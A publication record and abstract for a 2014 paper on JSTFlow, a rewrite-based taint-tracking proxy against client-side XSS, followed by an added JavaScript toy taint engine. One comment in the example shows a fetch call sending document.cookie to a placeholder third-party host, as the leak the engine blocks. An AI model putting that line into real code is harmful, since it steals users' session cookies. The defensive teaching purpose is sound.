Preventing Client Side XSS with Rewrite Based Dynamic Information Flow

Title: Preventing Client Side XSS with Rewrite Based Dynamic Information Flow
Publication Type: Conference Paper
Year of Publication: 2014
Authors: Wenmin Xiao, Jianhua Sun, Hao Chen, Xianghua Xu
Conference Name: Parallel Architectures, Algorithms and Programming (PAAP), 2014 Sixth International Symposium on
Date Published: July
Keywords: abstract intermediate representation, Abstracts, browser proxy, Browsers, client side XSS, code rewrite, cross-site scripting, data flow analysis, Data models, Engines, fine-grained isolation, information flow analysis, information flow tracking framework, Information security, Internet, Java, JavaScript, JavaScript abstract syntax tree, JavaScript code, JSTFlow, online front-ends, performance overhead, rewrite based dynamic information flow, security, security of data, Semantics, sensitive information leaks, Syntactics, taint engine, taint model, tainted information flow, Web applications, XSS Attacks

This paper presents the design and implementation of an information flow tracking framework based on code rewriting to prevent sensitive information leaks in browsers, combining the ideas of taint analysis and information flow analysis. The system has two main stages. First, it abstracts the semantics of JavaScript code and converts it into a general intermediate representation built from the JavaScript abstract syntax tree. Second, this abstract intermediate representation is executed by a dedicated taint engine that analyzes tainted information flow. The approach provides fine-grained isolation for both the confidentiality and the integrity of information. A proof-of-concept prototype, named JSTFlow, has been implemented and deployed as a browser proxy that rewrites web applications at runtime. Experimental results show that JSTFlow can guarantee the security of sensitive data and detect XSS attacks with about 3x performance overhead. Because it requires no modifications to the target system, the approach is readily deployable in practice.
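To make the abstract's two-stage idea concrete, the following is an added illustrative example, not code from the paper or from the JSTFlow prototype. It models what a rewrite-based taint engine does at runtime: reads of sensitive or untrusted sources are wrapped so the value carries a provenance label, rewritten operators and method calls propagate the labels, and rewritten sinks enforce an integrity policy (untrusted URL data must not reach `innerHTML`) and a confidentiality policy (cookie data must not reach a network request). The names `Tainted`, `taint`, `binop`, `callMethod`, `checkSink` and the `POLICY` table are assumptions made for this example; the sample inputs are constructed.

```javascript
// Added example of a miniature rewrite-based taint model for client-side
// JavaScript. Not JSTFlow's code; all names below are assumptions for the
// example, and all inputs are constructed.

// A value carrying a set of provenance labels (e.g. "url" or "cookie").
class Tainted {
  constructor(value, labels) {
    this.value = value;
    this.labels = new Set(labels);
  }
}

// Policy (constructed for the example): labels each sink refuses.
// "innerHTML" is an integrity sink: untrusted input must not reach it.
// "network" is a confidentiality sink: secrets must not leave the page.
const POLICY = {
  innerHTML: new Set(["url"]),
  network: new Set(["cookie"]),
};

// Source wrapper: the rewriter replaces reads of sources such as
// location.hash or document.cookie with taint(<read>, <label>).
function taint(value, label) {
  return new Tainted(value, [label]);
}

function labelsOf(v) {
  return v instanceof Tainted ? v.labels : new Set();
}

function rawOf(v) {
  return v instanceof Tainted ? v.value : v;
}

// Rewritten binary operator: the result inherits the union of both labels.
function binop(op, a, b) {
  const labels = new Set([...labelsOf(a), ...labelsOf(b)]);
  let result;
  switch (op) {
    case "+": result = rawOf(a) + rawOf(b); break;
    default: throw new Error("unsupported operator " + op);
  }
  return labels.size ? new Tainted(result, labels) : result;
}

// Rewritten method call: the return value keeps the receiver's labels
// plus those of any tainted argument (e.g. "abc".substring(1)).
function callMethod(recv, name, ...args) {
  const labels = new Set(labelsOf(recv));
  for (const a of args) for (const l of labelsOf(a)) labels.add(l);
  const result = rawOf(recv)[name](...args.map(rawOf));
  return labels.size ? new Tainted(result, labels) : result;
}

// Rewritten sink: instead of performing the DOM write or network send,
// report which forbidden labels reached it so the flow can be blocked.
function checkSink(sink, v) {
  const forbidden = POLICY[sink] || new Set();
  const violations = [...labelsOf(v)].filter((l) => forbidden.has(l));
  return { allowed: violations.length === 0, value: rawOf(v), violations };
}

// Original program (conceptually):
//   var q = location.hash.substring(1);
//   out.innerHTML = "Hello " + q;
// Rewritten form: the source read and the sink are replaced, and the
// operator and method call are routed through the taint engine.
function greetFromHash(locationHash) {
  const q = callMethod(taint(locationHash, "url"), "substring", 1);
  const html = binop("+", "Hello ", q);
  return checkSink("innerHTML", html);
}

// Original program (conceptually):
//   fetch("https://third-party.example/collect?c=" + document.cookie);
// Rewritten form: the cookie read is labelled and the request is a sink.
function sendCookie(cookie) {
  const url = binop("+", "https://third-party.example/collect?c=",
                    taint(cookie, "cookie"));
  return checkSink("network", url);
}

// A flow that touches no labelled source passes through unchanged.
function staticGreeting() {
  return checkSink("innerHTML", binop("+", "Hello ", "world"));
}

console.log(greetFromHash("#<b>hi</b>"));   // blocked: "url" reached innerHTML
console.log(sendCookie("session=abc"));      // blocked: "cookie" reached network
console.log(staticGreeting());               // allowed
```

The design choice worth noting is that the policy lives in the sink wrappers, not in the rewritten program: the rewriter only has to recognise sources, operators, calls and sinks syntactically, which is why such an engine can run as a proxy without changing the browser or the target site. A real engine must also handle implicit flows (branching on a tainted value) and the many DOM and string APIs this toy omits.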

Citation Key: 6916471